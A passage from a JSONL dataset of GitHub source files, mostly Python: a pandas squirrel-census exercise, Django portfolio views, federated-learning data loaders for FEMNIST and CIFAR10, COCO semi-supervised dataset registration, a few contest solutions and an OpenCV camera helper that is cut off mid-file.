json\n config_data = {\n \"timestamp\": time.time(),\n \"preprocess_config\": preprocess_config,\n \"model_config\": model_config,\n \"training_config\": training_config\n }\n create_json(config_data, config.CONFIG_JSON.format(train_count))\n\n\nif __name__ == '__main__':\n # Train and prepare submission for configured hyper parameters\n # weighted ensemble from utils can be used for ensembling different hyper parameters models\n train_iteration = 100\n print(\"Train iteration :\", train_iteration)\n prepare_and_train(train_iteration, (preprocess_para, training_para, model_para))\n","repo_name":"drc10723/toxic_comments_multilabel_classification","sub_path":"train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":5574,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"28296273395","text":"import pandas as pd\n\n# data = pd.read_csv('weather_data.csv')\n#\n# data_dict = data.to_dict()\n# #print(data_dict)\n#\n# temp_list = data['temp'].to_list()\n# #print(temp_list)\n\n# sum=0\n# for temp in temp_list:\n# sum = sum+temp\n# avg = sum/len(temp_list)\n# #print(avg)\n\n#print(data[data['day']=='Monday']['temp'])\n\n# data = {\n# 'students': [\"Amy\", \"James\", \"Angela\"],\n# \"scores\": [76,56,65]\n# }\n#\n# data_df = pd.DataFrame(data)\n#\n# print(data_df)\nsquirrel = pd.read_csv('2018_Central_Park_Squirrel_Census_-_Squirrel_Data.csv')\n#print(squirrel['Primary Fur Color'].value_counts())\n# squirrel_count = squirrel['Primary Fur Color'].value_counts().to_frame()\n# print(squirrel_count)\n\ngray_squirrel_count= len(squirrel[squirrel['Primary Fur Color'] == 'Gray'])\nred_squirrel_count= len(squirrel[squirrel['Primary Fur Color'] == 'Cinnamon'])\nblack_squirrel_count= len(squirrel[squirrel['Primary Fur Color'] == 'Black'])\n\ndata_dict = {\n \"Fur color\":[\"Gray\", \"Cinnamon\", \"Black\"],\n \"Count\": [gray_squirrel_count, red_squirrel_count, black_squirrel_count]\n}\nsf = pd.DataFrame(data_dict)\nsf.to_csv('squirrel_count.csv')","repo_name":"XSiddhSaraf/100DaysOfCode","sub_path":"pandas_introduction/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31101098558","text":"# 소수\n# 소수 판정\n\n# M = int(input())\n# N = int(input())\n\n# arr = []\n# for i in range(N-M+1) :\n# arr.append(i+M)\n# for i in range(N) :\n# if i!=0 and i!=1 :\n# for j in arr :\n# if (i < j and j%i == 0) or j == 1 :\n# arr.remove(j)\n# if len(arr) == 0 :\n# print(-1)\n# else :\n# min = arr[0]\n# sum = 0\n# for i in arr :\n# if i<min :\n# min = i\n# sum += i\n\n# print(sum)\n# print(min)\n\nM = int(input())\nN = int(input())\n\nsum = 0\nmin = 0\nfor i in range(M, N+1) :\n # i가 소수임을 판별\n isDecimal = True\n for j in range(2, i) :\n if i % j == 0:\n isDecimal = False\n break\n if i != 1 and isDecimal :\n if sum == 0 :\n # 최초로 나온 소수가 최솟값\n min = i\n sum += i\n\nif sum == 0 :\n print(-1)\nelse :\n print(sum)\n print(min)","repo_name":"halionaz/Algorithm","sub_path":"baekjoon/2581.py","file_name":"2581.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"28907621442","text":"from __future__ import unicode_literals\n\nfrom django.db.models import Max, Min\nfrom django.views.generic import TemplateView, ListView, DetailView\n\nfrom .models import Project\n\n\nclass AboutView(TemplateView):\n\ttemplate_name = 'bio.html'\n\n\nclass HomeView(ListView):\n\ttemplate_name = 'index.html'\n\tmodel = Project\n\n\tdef get_context_data(self, **kwargs):\n\t\tcontext = super(HomeView, self).get_context_data(**kwargs)\n\t\tcontext['project_list'] = Project.objects.filter(\n\t\t\tfeatured=True).order_by('order')\n\t\treturn context\n\n\nclass WorkList(ListView):\n\tmodel = Project\n\ttemplate_name = 'work.html'\n\tordering = ('order')\n\n\nclass WorkDetail(DetailView):\n\tmodel = Project\n\ttemplate_name = 'work_detail.html'\n\n\tdef get_context_data(self, **kwargs):\n\t\tcontext = super(WorkDetail, self).get_context_data(**kwargs)\n\t\tcontext['tags'] = Project.objects.filter(tags=True)\n\t\tcontext['happy_chat'] = ['Building', 'Creating', 'The Making of', 'About']\n\n\t\t# Add previous and next projects for end-of-page links\n\t\tcurrent = context['project'].order\n\t\tfirst = Project.objects.all().aggregate(Min('order'))['order__min']\n\t\tlast = Project.objects.all().aggregate(Max('order'))['order__max']\n\t\tif current > first:\n\t\t\tcontext['previous'] = Project.objects.get(order=current-1)\n\t\tif current < last:\n\t\t\tcontext['next'] = Project.objects.get(order=current+1)\n\t\treturn context\n","repo_name":"SarahJaine/sarahjaine.com","sub_path":"sarahjaine/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"33185235419","text":"\"\"\"\nFunctions for loading FEMNIST, CIFAR100, Shakespeare, StackOverflow datasets.\nPyTorchDataFeeder class for conveniently containing a single worker's dataset,\nand retrieving a stream of data batches from it. Also has some data utility \nfunctions.\n\"\"\"\nimport torch\nimport pickle\nimport numpy as np\nimport os\nimport json\nimport h5py\nimport scipy.sparse\nimport idx2numpy\nfrom torchvision import datasets, transforms\n\n \nclass PyTorchDataFeeder():\n \"\"\"\n Used to easily contain the samples of a FL worker. Can hold the samples on \n the GPU, and produce an endless stream of randomly drawn samples with a \n given transformation applied.\n \"\"\"\n\n def __init__( self, x, x_dtype, y, y_dtype, device, \n cast_device=None, transform=None):\n \"\"\"\n Return a new PyTorchDataFeeder with copies of x and y as torch.tensors.\n Data will be stored on device. If x_dtype or y_dtype are the string \n 'long' then these tensors will be cast to the torch long dtype (used\n typically when pytorch models are expecting integer values). If \n cast_device is passed, the data returned by next_batch will be cast to \n this device. Doing so allows data held on the CPU to be easily fed to a \n model sitting in the GPU memory, if, for example, all data won't fit in\n GPU memory. If transform is passed, the samples returned by next_batch \n are transformed by this function.\n \n Args:\n - x: {numpy.ndarray, torch.tensor} of samples\n - x_dtype: {torch.dtype, 'long'} that x will be\n - y: {numpy.ndarray, torch.tensor} of targets\n - y_dtype: {torch.dtype, 'long'} that y will be \n - device: {torch.device} that x and y will sit on\n - cast_device: {torch.device} next_batch returned data will be on here\n - transform: {callable} applied by next_batch\n \"\"\"\n self.x, self.x_sparse = self._matrix_type_to_tensor(x, x_dtype, device)\n self.y, self.y_sparse = self._matrix_type_to_tensor(y, y_dtype, device)\n self.idx = 0\n self.n_samples = x.shape[0]\n self.cast_device = cast_device\n self.transform = transform\n self.active = False\n self.activate()\n self._shuffle_data()\n self.deactivate()\n \n def _matrix_type_to_tensor(self, matrix, dtype, device):\n \"\"\"\n Converts a scipy.sparse.coo_matrix or a numpy.ndarray into a \n torch.sparse_coo_tensor or torch.tensor. \n \n Args:\n - matrix: {scipy.sparse.coo_matrix or np.ndarray} to convert\n - dtype: {torch.dtype} of the tensor to make \n - device: {torch.device} where the tensor should be placed\n \n Returns: (tensor, is_sparse)\n - tensor: {torch.sparse_coo_tensor or torch.tensor}\n - is_sparse: {bool} True if returning a torch.sparse_coo_tensor\n \"\"\"\n if type(matrix) == scipy.sparse.coo_matrix:\n is_sparse = True\n idxs = np.vstack((matrix.row, matrix.col))\n\n if dtype == 'long':\n tensor = torch.sparse_coo_tensor( idxs, \n matrix.data, \n matrix.shape, \n device=device, \n dtype=torch.int32).long()\n \n else:\n tensor = torch.sparse_coo_tensor( idxs, \n matrix.data, \n matrix.shape, \n device=device, \n dtype=dtype)\n \n elif type(matrix) == np.ndarray:\n is_sparse = False\n if dtype == 'long':\n tensor = torch.tensor( matrix, \n device=device, \n dtype=torch.int32).long()\n else:\n tensor = torch.tensor( matrix, \n device=device, \n dtype=dtype)\n else:\n raise TypeError('Only np.ndarray/scipy.sparse.coo_matrix accepted.')\n \n return tensor, is_sparse\n \n \n \n def activate(self):\n \"\"\"\n Activate this PyTorchDataFeeder to allow .next_batch(...) to be called. \n Will turn torch.sparse_coo_tensors into dense representations ready for \n training.\n \"\"\"\n self.active = True\n self.all_x_data = self.x.to_dense() if self.x_sparse else self.x\n self.all_y_data = self.y.to_dense() if self.y_sparse else self.y\n \n def deactivate(self):\n \"\"\"\n Deactivate this PyTorchDataFeeder to disallow .next_batch(...). Will \n deallocate the dense matrices created by activate to save memory.\n \"\"\"\n self.active = False\n self.all_x_data = None\n self.all_y_data = None\n \n \n def _shuffle_data(self):\n \"\"\"\n Co-shuffle the x and y data.\n \"\"\"\n if not self.active:\n raise RuntimeError('_shuffle_data(...) called when feeder not active.')\n \n ord = torch.randperm(self.n_samples)\n self.x = self.all_x_data[ord].to_sparse() if self.x_sparse else self.all_x_data[ord]\n self.y = self.all_y_data[ord].to_sparse() if self.y_sparse else self.all_y_data[ord]\n \n def next_batch(self, B):\n \"\"\"\n Return a batch of randomly ordered data from this dataset. If B=-1, \n return all the data as one big batch. If self.cast_device is not None, \n then data will be sent to this device before being returned. If \n self.transform is not None, that function will be applied to the data \n before being returned.\n \n Args:\n - B: {int} size of batch to return.\n \"\"\"\n if not self.active:\n raise RuntimeError('next_batch(...) called when feeder not active.')\n \n if B == -1: # return all data as big batch\n x = self.all_x_data\n y = self.all_y_data\n self._shuffle_data()\n \n elif self.idx + B > self.n_samples: # need to wraparound dataset \n extra = (self.idx + B) - self.n_samples\n x = torch.cat(( self.all_x_data[self.idx:], \n self.all_x_data[:extra]))\n y = torch.cat(( self.all_y_data[self.idx:], \n self.all_y_data[:extra]))\n self._shuffle_data()\n self.idx = 0\n \n else: # next batch can easily be obtained\n x = self.all_x_data[self.idx:self.idx+B]\n y = self.all_y_data[self.idx:self.idx+B]\n self.idx += B\n \n if not self.cast_device is None: # send to cast_device\n x = x.to(self.cast_device)\n y = y.to(self.cast_device)\n \n if not self.transform is None: # perform transformation\n x = self.transform(x)\n\n return x, y\n\n\ndef load_femnist(train_dir, test_dir, W):\n \"\"\"\n Load the FEMNIST data contained in train_dir and test_dir. These dirs should\n contain only .json files that have been produced by the LEAF \n (https://leaf.cmu.edu/) preprocessing tool. Will load W workers' worth of \n data from these files.\n \n Args:\n - train_dir: {str} path to training data folder\n - test_dir: {str} path to test data folder\n - W: {int} number of workers' worth of data to load\n \n Returns: (x_train, y_train), (x_test, y_test)\n - x_train: {list} of np.ndarrays\n - y_train: {list} of np.ndarrays\n - x_test: {np.ndarray}\n - y_test: {np.ndarray}\n \"\"\"\n train_fnames = sorted([train_dir+'/'+f for f in os.listdir(train_dir)])\n test_fnames = sorted([test_dir+'/'+f for f in os.listdir(test_dir)])\n # each .json file contains data for 100 workers\n n_files = int(np.ceil(W / 100))\n \n x_train = []\n y_train = []\n x_test = []\n y_test = []\n\n tot_w = 0\n for n in range(n_files):\n with open(train_fnames[n], 'r') as f:\n train = json.load(f)\n with open(test_fnames[n], 'r') as f:\n test = json.load(f)\n \n keys = sorted(train['user_data'].keys())\n \n for key in keys:\n # (1.0 - data) so images are white on black like classic MNIST\n x = 1.0 - np.array(train['user_data'][key]['x'], dtype=np.float32)\n x = x.reshape((x.shape[0], 28, 28, 1))\n # transpose (rather than reshape) required to get actual order of \n # data in ndarray to change. If reshape is used, when data is \n # passed to a torchvision.transform, then the resulting images come\n # out incorrectly.\n x = np.transpose(x, (0, 3, 1, 2))\n y = np.array(train['user_data'][key]['y'])\n \n x_train.append(x)\n y_train.append(y)\n \n x = 1.0 - np.array(test['user_data'][key]['x'], dtype=np.float32)\n x = x.reshape((x.shape[0], 28, 28, 1))\n x = np.transpose(x, (0, 3, 1, 2))\n y = np.array(test['user_data'][key]['y'])\n \n x_test.append(x)\n y_test.append(y)\n \n tot_w += 1\n \n if tot_w == W:\n break\n \n assert tot_w == W, 'Could not load enough workers from files.'\n \n x_test = np.concatenate(x_test)\n y_test = np.concatenate(y_test)\n\n return (x_train, y_train), (x_test, y_test)\n\ndef load_cifar10(num_users, n_class, n_samples, rate_unbalance):\n \"\"\"\n This non-i.i.d cifar10 is implemented from\n https://github.com/jeremy313/non-iid-dataset-for-personalized-federated-learning\n the official implementation of the non-iid dataset in \"LotteryFL: Personalized and\n Communication-Efficient Federated Learning with Lottery Ticket Hypothesis on Non-IID Datasets\".\n Args:\n - num_users: {int} the number of workers\n - n_class: {int} the number of image classes each client has\n - n_samples: {int{ the number of samples per class distributed to clients\n - rate_unbalance: {float} unbalance rate of cifar10 data, (0-1) 1 denotes balanced\n \"\"\"\n data_dir = '../data/CIFAR10_data/'\n apply_transform = transforms.Compose(\n [transforms.ToTensor(),\n transforms.Pad(4),\n transforms.RandomHorizontalFlip(),\n transforms.RandomCrop(32),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010))])\n train_dataset = datasets.CIFAR10(data_dir, train=True, download=True,\n transform=apply_transform)\n\n test_dataset = datasets.CIFAR10(data_dir, train=False, download=True,\n transform=apply_transform)\n\n test_imgs, test_labels = test_dataset.data, test_dataset.targets\n train_imgs, train_labels = train_dataset.data, train_dataset.targets\n\n # transpose (rather than reshape) required to get actual order of\n # data in ndarray to change. If reshape is used, when data is\n # passed to a torchvision.transform, then the resulting images come\n # out incorrectly.\n train_imgs = [np.transpose(imgs, (2, 0, 1)) for imgs in train_imgs]\n test_imgs = [np.transpose(imgs, (2, 0, 1)) for imgs in test_imgs]\n\n # Chose euqal splits for every user\n num_shards_train, num_imgs_train = int(50000 / n_samples), n_samples\n num_classes = 10\n assert (n_class * num_users <= num_shards_train)\n assert (n_class <= num_classes)\n idx_shard = [i for i in range(num_shards_train)]\n dict_users_train = {i: np.array([]) for i in range(num_users)}\n idxs = np.arange(num_shards_train * num_imgs_train)\n\n labels = train_labels\n # labels_test_raw = np.array(test_dataset.targets)\n\n # sort labels\n idxs_labels = np.vstack((idxs, labels))\n idxs_labels = idxs_labels[:, idxs_labels[1, :].argsort()]\n idxs = idxs_labels[0, :]\n labels = idxs_labels[1, :]\n\n # divide and assign\n for i in range(num_users):\n user_labels = np.array([])\n rand_set = set(np.random.choice(idx_shard, n_class, replace=False))\n idx_shard = list(set(idx_shard) - rand_set)\n unbalance_flag = 0\n for rand in rand_set:\n if unbalance_flag == 0:\n dict_users_train[i] = np.concatenate(\n (dict_users_train[i], idxs[rand * num_imgs_train:(rand + 1) * num_imgs_train]), axis=0)\n user_labels = np.concatenate((user_labels, labels[rand * num_imgs_train:(rand + 1) * num_imgs_train]),\n axis=0)\n else:\n dict_users_train[i] = np.concatenate(\n (dict_users_train[i], idxs[rand * num_imgs_train:int((rand + rate_unbalance) * num_imgs_train)]),\n axis=0)\n user_labels = np.concatenate(\n (user_labels, labels[rand * num_imgs_train:int((rand + rate_unbalance) * num_imgs_train)]), axis=0)\n unbalance_flag = 1\n\n train_xs, train_ys = [], []\n train_imgs = np.array(train_imgs)\n train_labels = np.array(train_labels)\n for key in dict_users_train.keys():\n idx = dict_users_train[key].astype(int)\n train_x = train_imgs[idx]\n train_y = train_labels[idx]\n train_xs.append(train_x)\n train_ys.append(train_y)\n\n return (train_xs, train_ys), (test_imgs, test_labels)\n \ndef to_tensor(x, device, dtype):\n \"\"\"\n Returns x as a torch.tensor.\n \n Args:\n - x: {np.ndarray} data to convert\n - device: {torch.device} where to store the tensor\n - dtype: {torch.dtype or 'long'} type of data\n \n Returns: {torch.tensor}\n \"\"\"\n if dtype == 'long':\n return torch.tensor(x, device=device, \n requires_grad=False, dtype=torch.int32).long()\n else:\n return torch.tensor(x, device=device, requires_grad=False, dtype=dtype)\n\n\n\ndef step_values(x, m):\n \"\"\"\n Return a stepwise copy of x, where the values of x that are equal to m are \n taken from the last non-m value of x.\n \n Args:\n - x: {np.ndarray} values to make step-wise\n - m: {number} (same type as x) value to step over/ignore\n \"\"\"\n stepped = np.zeros_like(x)\n curr = x[0]\n \n for i in range(1, x.size):\n if x[i] != m:\n curr = x[i]\n stepped[i] = curr\n \n return stepped\n\ndef sum_model_L2_distance(x, y):\n \"\"\"\n Args:\n - x: {NumpyModel}\n - y: {NumpyModel}\n\n Returns: {float} Sum L2 distance between tensors in x and y.\n \"\"\"\n dists = (x - y) ** 2\n sums = [np.sum(d) for d in dists]\n sqrts = [np.sqrt(s) for s in sums]\n return np.sum(sqrts)\n \ndef n_bits(array):\n \"\"\"\n Args:\n - array: {np.ndarray}\n\n Returns:\n - bits: {int} the bits of the array\n \"\"\"\n bits = 8 * array.nbytes\n return bits\n\ndef orthogonalize(matrix, eps=1e-8):\n n, m = matrix.shape\n for i in range(m):\n # Normalize the i'th column\n col = matrix[:, i:i+1]\n col /= np.sqrt(np.sum(col ** 2)) + eps\n matrix[:, i:i+1] = col\n # Project it on the rest and remove it\n if i + 1 < m:\n rest = matrix[:, i+1:]\n rest -= np.sum(col * rest, axis=0) * col\n matrix[:, i+1:] = rest\n return matrix\n","repo_name":"Vblack929/BCFed","sub_path":"fl/data_utils.py","file_name":"data_utils.py","file_ext":"py","file_size_in_byte":15853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"183174679","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nif __name__ == '__main__':\n import __classic_import # noqa\nelse:\n from . import __classic_import # noqa\nimport market.access.agent.mt.env as env\n\n\nclass T(env.AgentSuite):\n NodeId = None\n\n @classmethod\n def connect(cls):\n return {\n 'access_server': cls.access_agent.access_server\n }\n\n @classmethod\n def prepare(cls):\n cls.access_agent.config.Downloader.Dry = True\n cls.access_agent.config.Installer.Dry = True\n cls.access_agent.config.Consumer.BlindLoadInterval.seconds = 100500\n\n def test_blind_load(self):\n self.access_server.create_publisher('dwarf')\n self.access_server.create_resource('gold', publisher_name='dwarf')\n self.access_server.create_version(resource_name='gold', rbtorrent='link-to-file')\n\n session = self.access_agent.create_session()\n resource = self.access_agent.install_resource_sync(session.id, 'gold')\n self.access_agent.commit_resource(session.id, 'gold', resource.load[0].spec.version.number)\n version_number = resource.load[0].spec.version.number\n\n self.access_server.stop_server()\n\n session = self.access_agent.create_session()\n resource = self.access_agent.install_resource_sync(session.id, 'gold')\n self.assertEqual(resource.load[0].spec.version.number, version_number)\n\n\nif __name__ == '__main__':\n env.main()\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"market/GENERAL/test_blind_load.py","file_name":"test_blind_load.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33786197380","text":"import json\nimport numpy as np\nimport os\nimport tqdm\n\nfrom tensorpack.utils import logger\nfrom tensorpack.utils.timer import timed_operation\n\nfrom config import config as cfg\nfrom pycocotools.coco import COCO\nfrom pycocotools.cocoeval import COCOeval\n\nfrom FasterRCNN.dataset import DatasetRegistry\nfrom FasterRCNN.dataset import DatasetSplit\nfrom FasterRCNN.dataset.coco import COCODetection as COCODetectionBase\nfrom FasterRCNN.dataset.coco import register_coco as register_coco_supervised\n\n__all__ = [\"register_coco\"]\n\n\n# register semi-supervised splits for coco\nSEMI_SUPERVISED_SPLITS = []\nfor seed in range(1, 6):\n for percent in [1, 2, 5, 10, 20, 30, 40, 50]:\n SEMI_SUPERVISED_SPLITS.append(\"train2017.{}@{}\".format(seed, percent))\n # adding corresponding unlabeled one\n SEMI_SUPERVISED_SPLITS.append(\"train2017.{}@{}-unlabeled\".format(\n seed, percent))\n# 100% , unlab is with lab\nSEMI_SUPERVISED_SPLITS.append(\"train2017.{}@{}-extra\".format(0, 100))\nSEMI_SUPERVISED_SPLITS.append(\"train2017.{}@{}-extra-unlabeled\".format(0, 100))\n# coco unlabled data\nSEMI_SUPERVISED_SPLITS.append(\"unlabeled2017\")\n# coco 20 class unlabeled for voc\nNUM_20CLASS = 1\nSEMI_SUPERVISED_SPLITS.append(\"unlabeledtrainval20class\")\n\n\nclass COCODetection(COCODetectionBase):\n \"\"\"COCO class object.\n\n Mapping from the incontinuous COCO category id to an id in [1, #category]\n For your own coco-format, dataset, change this to an **empty dict**.\n \"\"\"\n # handle a few special splits whose names do not match the directory names\n _INSTANCE_TO_BASEDIR = {\n \"valminusminival2014\": \"val2014\",\n \"minival2014\": \"val2014\",\n \"val2017_100\": \"val2017\",\n \"unlabeled2017\": \"unlabeled2017\",\n \"train2017.{}@{}-extra\".format(0, 100): \"\",\n \"train2017.{}@{}-extra-unlabeled\".format(0, 100): \"\",\n }\n\n def __init__(self, basedir, split):\n \"\"\"Init.\n\n Args:\n basedir (str): root of the dataset which contains the subdirectories\n for each split and annotations\n split (str): the name of the split, e.g. \"train2017\". The split has\n to match an annotation file in \"annotations/\" and a directory of\n images.\n Examples:\n For a directory of this structure: DIR/ annotations/\n instances_XX.json instances_YY.json XX/ YY/ use\n `COCODetection(DIR, 'XX')` and `COCODetection(DIR, 'YY')`\n \"\"\"\n for sp in SEMI_SUPERVISED_SPLITS:\n if sp not in self._INSTANCE_TO_BASEDIR:\n self._INSTANCE_TO_BASEDIR.update({str(sp): \"train2017\"})\n\n basedir = os.path.expanduser(basedir)\n self._imgdir = os.path.realpath(\n os.path.join(basedir, self._INSTANCE_TO_BASEDIR.get(split, split)))\n assert os.path.isdir(self._imgdir), \"{} is not a directory!\".format(\n self._imgdir)\n if split in SEMI_SUPERVISED_SPLITS:\n annotation_file = os.path.join(\n basedir,\n \"annotations/semi_supervised/instances_{}.json\".format(split))\n else:\n annotation_file = os.path.join(\n basedir, \"annotations/instances_{}.json\".format(split))\n assert os.path.isfile(annotation_file), annotation_file\n\n self.coco = COCO(annotation_file)\n self.annotation_file = annotation_file\n logger.info(\"Instances loaded from {}.\".format(annotation_file))\n\n def eval_inference_results2(self,\n results,\n output=None,\n threshold=None,\n metric_only=False):\n # Compared with eval_inference_results, v2 version has an threshold\n # used to filter scores below. It is designed for SSL experiments.\n if not metric_only:\n if threshold is not None:\n logger.warn(\n \"Use thresholding {} to filter final resulting boxes\".format(\n threshold))\n continuous_id_to_COCO_id = {\n v: k for k, v in self.COCO_id_to_category_id.items()\n }\n n = 0\n final_results = []\n for res in results:\n # convert to COCO's incontinuous category id\n if res[\"category_id\"] in continuous_id_to_COCO_id:\n res[\"category_id\"] = continuous_id_to_COCO_id[res[\"category_id\"]]\n\n if threshold is not None:\n if res[\"score\"] < threshold:\n n += 1\n continue\n # COCO expects results in xywh format\n box = res[\"bbox\"]\n box[2] -= box[0]\n box[3] -= box[1]\n res[\"bbox\"] = [round(float(x), 3) for x in box]\n final_results.append(res)\n\n results = final_results\n if output is not None:\n if not os.path.exists(os.path.dirname(output)):\n os.makedirs(os.path.dirname(output))\n with open(output, \"w\") as f:\n json.dump(results, f)\n if threshold is not None:\n with open(output + \"_boxcount.json\", \"w\") as f:\n r = {\"passed\": len(results), \"removed\": n}\n print(\"Box thresholding stats: \\n\\t\", r)\n json.dump(r, f)\n\n if len(results):\n metrics = self.print_coco_metrics(results)\n # save precision_recall data:\n precision_recall = self.cocoEval.precision_recall\n pr_path = os.path.join(os.path.split(output)[0], \"precision_recall.npy\")\n print(\"Saving precision_recall curve to {}\".format(pr_path))\n np.save(pr_path, {\"pr\": precision_recall})\n # sometimes may crash if the results are empty?\n return metrics\n else:\n return {}\n\n\ndef register_coco(basedir):\n \"\"\"Register COCO.\n\n Add COCO datasets like \"coco_train201x\" to the registry,\n so you can refer to them with names in `cfg.DATA.TRAIN/VAL`.\n\n Note that train2017==trainval35k==train2014+val2014-minival2014, and\n val2017==minival2014.\n\n Args:\n basedir: root dir that saves datasets.\n \"\"\"\n\n # 80 names for COCO\n # For your own coco-format dataset, change this.\n class_names = [\n \"person\", \"bicycle\", \"car\", \"motorcycle\", \"airplane\", \"bus\", \"train\",\n \"truck\", \"boat\", \"traffic light\", \"fire hydrant\", \"stop sign\",\n \"parking meter\", \"bench\", \"bird\", \"cat\", \"dog\", \"horse\", \"sheep\", \"cow\",\n \"elephant\", \"bear\", \"zebra\", \"giraffe\", \"backpack\", \"umbrella\", \"handbag\",\n \"tie\", \"suitcase\", \"frisbee\", \"skis\", \"snowboard\", \"sports ball\", \"kite\",\n \"baseball bat\", \"baseball glove\", \"skateboard\", \"surfboard\",\n \"tennis racket\", \"bottle\", \"wine glass\", \"cup\", \"fork\", \"knife\", \"spoon\",\n \"bowl\", \"banana\", \"apple\", \"sandwich\", \"orange\", \"broccoli\", \"carrot\",\n \"hot dog\", \"pizza\", \"donut\", \"cake\", \"chair\", \"couch\", \"potted plant\",\n \"bed\", \"dining table\", \"toilet\", \"tv\", \"laptop\", \"mouse\", \"remote\",\n \"keyboard\", \"cell phone\", \"microwave\", \"oven\", \"toaster\", \"sink\",\n \"refrigerator\", \"book\", \"clock\", \"vase\", \"scissors\", \"teddy bear\",\n \"hair drier\", \"toothbrush\"\n ] # noqa\n class_names = [\"BG\"] + class_names\n register_coco_supervised(basedir)\n\n for split in SEMI_SUPERVISED_SPLITS[:-NUM_20CLASS]:\n name = \"coco_\" + split\n DatasetRegistry.register(name, lambda x=split: COCODetection(basedir, x))\n DatasetRegistry.register_metadata(name, \"class_names\", class_names)\n\n logger.info(\"Register dataset {}\".format(\n [a for a in DatasetRegistry._registry.keys()])) # pylint: disable=protected-access\n\n assert os.environ[\"COCODIR\"], \"COCODIR environ variable is not set\".format(\n os.environ[\"COCODIR\"])\n # also register coco train set 20 class for voc experiments\n register_coco_for_voc(os.environ[\"COCODIR\"])\n\n\nclass COCODetectionForVOC(COCODetection):\n \"\"\"COCODetection for VOC.\"\"\"\n # set to empty since this instances_unlabeledtrainval20class.json file has file_name with relative path to train2017 or val2017\n _INSTANCE_TO_BASEDIR = {\"unlabeledtrainval20class\": \"\"}\n # this mapping is obtained by running dataset/cls_mapping_coco_voc.py\n COCO_id_to_category_id = {\n 64: 14,\n 1: 3,\n 2: 6,\n 3: 10,\n 4: 1,\n 5: 16,\n 6: 18,\n 7: 9,\n 72: 20,\n 9: 8,\n 67: 19,\n 44: 17,\n 16: 11,\n 17: 12,\n 18: 2,\n 19: 4,\n 20: 15,\n 21: 7,\n 62: 13,\n 63: 5\n }\n\n\ndef register_coco_for_voc(basedir):\n class_names = [\n \"person\", \"chair\", \"aeroplane\", \"bus\", \"cow\", \"bird\", \"motorbike\", \"boat\",\n \"car\", \"horse\", \"sofa\", \"pottedplant\", \"tvmonitor\", \"cat\", \"train\",\n \"bottle\", \"diningtable\", \"dog\", \"bicycle\", \"sheep\"\n ]\n class_names = [\"BG\"] + class_names\n for split in SEMI_SUPERVISED_SPLITS[-NUM_20CLASS:]:\n name = \"coco_\" + split\n DatasetRegistry.register(\n name, lambda x=split: COCODetectionForVOC(basedir, x))\n DatasetRegistry.register_metadata(name, \"class_names\", class_names)\n\n logger.info(\"Register dataset {}\".format(\n [a for a in DatasetRegistry._registry.keys()]))\n\n\nif __name__ == \"__main__\":\n basedir = \"<add-data-path>\"\n c = COCODetection(basedir, \"train2017\")\n roidb = c.load(add_gt=True, add_mask=True)\n print(\"#Images:\", len(roidb))\n","repo_name":"google-research/ssl_detection","sub_path":"detection/dataset/coco.py","file_name":"coco.py","file_ext":"py","file_size_in_byte":8897,"program_lang":"python","lang":"en","doc_type":"code","stars":389,"dataset":"github-code","pt":"72"} +{"seq_id":"23077522574","text":"from collections import deque\nINF = float('inf')\nN, u, v = map(int, input().split())\nu -= 1\nv -= 1\nG = [[] for _ in range(N)]\nfor _ in range(N - 1):\n A, B = map(lambda x: int(x) - 1, input().split())\n G[A].append(B)\n G[B].append(A)\n\n\ndef bfs(s):\n d = [INF] * N\n d[s] = 0\n q = deque([s])\n while len(q):\n u = q.popleft()\n for v in G[u]:\n if d[v] > d[u] + 1:\n d[v] = d[u] + 1\n q.append(v)\n return d\n\n\nd1 = bfs(u)\nd2 = bfs(v)\nres = max(x2 for x1, x2 in zip(d1, d2) if x1 < x2) - 1\nlst = [x2 for x1, x2 in zip(d1, d2) if x1 == x2]\nif len(lst) and min(lst) > res:\n res = min(lst)\nprint(res)\n","repo_name":"e5pe0n/algorithm-training","sub_path":"AtCoder/ABC/148/python/F_Playing_Tag_on_Tree.py","file_name":"F_Playing_Tag_on_Tree.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19426312948","text":"import cv2\n\n\nclass CamIO:\n capture = None\n mainq = None\n clientqs = []\n\n def __init__(self, resolution, port, saturation, clientlist):\n res = resolution.split('x')\n self.capture = cv2.VideoCapture(port)\n self.capture.set(cv2.cv.CV_CAP_PROP_FRAME_WIDTH, float(res[0]))\n self.capture.set(cv2.cv.CV_CAP_PROP_FRAME_HEIGHT, float(res[1]))\n self.capture.set(cv2.cv.CV_CAP_PROP_SATURATION, float(saturation))\n self.mainq = clientlist\n\n def getimage(self):\n return cv2.GaussianBlur(self.capture.read()[1], (5, 5), 0)\n\n @staticmethod\n def writeimg(path, img):\n cv2.imwrite(path, img)\n\n @staticmethod\n def togray(img):\n return cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n @staticmethod\n def torgb(img):\n return cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n\n @staticmethod\n def diffimg(t_minus, t, t_plus):\n t_minus = cv2.cvtColor(t_minus, cv2.COLOR_BGR2GRAY)\n t = cv2.cvtColor(t, cv2.COLOR_BGR2GRAY)\n t_plus = cv2.cvtColor(t_plus, cv2.COLOR_BGR2GRAY)\n d1 = cv2.absdiff(t_plus, t)\n d2 = cv2.absdiff(t, t_minus)\n return cv2.bitwise_and(d1, d2)\n\n @staticmethod\n def getvalidpixels(img):\n return cv2.countNonZero(img)\n\n @staticmethod\n def camavailable(port):\n try:\n cap = 